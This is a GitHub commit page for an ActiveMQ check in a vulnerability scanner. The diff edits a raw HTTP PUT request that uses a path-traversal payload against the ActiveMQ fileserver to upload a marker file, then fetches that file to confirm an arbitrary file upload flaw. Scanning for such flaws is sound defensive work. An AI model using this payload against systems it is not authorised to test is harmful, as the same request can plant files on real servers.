Skip to content

Commit

Permalink
Update activemq_upload.py
Browse files Browse the repository at this point in the history
  • Loading branch information
wolf authored Sep 28, 2017
1 parent b1c86b4 commit d2ee681
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions vulscan/vuldb/activemq_upload.py
Original file line number Diff line number Diff line change
Expand Up @@ -29,12 +29,12 @@ def check(ip, port, timeout):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
filename = random_str(6)
flag = "PUT /fileserver/sex../../..\\admin/%s.txt HTTP/1.0\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n"%(filename)
flag = "PUT /fileserver/sex../../..\\styles/%s.txt HTTP/1.0\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n"%(filename)
s.send(flag)
time.sleep(1)
s.recv(1024)
s.close()
url = 'http://' + ip + ":" + str(port) + '/admin/%s.txt'%(filename)
url = 'http://' + ip + ":" + str(port) + '/styles/%s.txt'%(filename)
res_html = urllib2.urlopen(url, timeout=timeout).read(1024)
if 'xxscan0' in res_html:
return u"存在任意文件上传漏洞," + url
Expand Down

0 comments on commit d2ee681

Please sign in to comment.